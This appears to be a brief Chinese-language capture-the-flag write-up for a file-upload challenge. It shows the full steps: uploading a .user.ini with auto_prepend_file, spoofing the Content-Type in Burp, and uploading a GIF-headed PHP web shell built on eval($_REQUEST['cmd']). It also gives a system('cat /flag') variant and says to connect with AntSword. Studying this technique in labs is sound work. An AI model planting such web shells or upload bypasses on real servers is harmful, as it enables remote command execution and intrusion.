1.新建.user.ini文件内容在下面
GIF89a
auto_prepend_file=a.jpg
上传上面的文件用BURP抓包
把Content-Type: application/octet-stream改成Content-Type: image/jpg
放行
新建a.txt文件,内容为
GIF89a
<?=eval($_REQUEST['cmd']);?>
保存后把文件名改成.jpg
上传a.jpg这样才算成功(如图)。
F12打开网络找到网址
用蚁剑连接(每个人的都不一样)
然后就可以开始找flag,当然你也可以一开始就把muma.jpg里的代码改成cat,直接抓取flag,还省的自己找。<?=system(‘cat/flag’);?>
我打/直接拉到最下面有flag点进去就是答案了
得出答案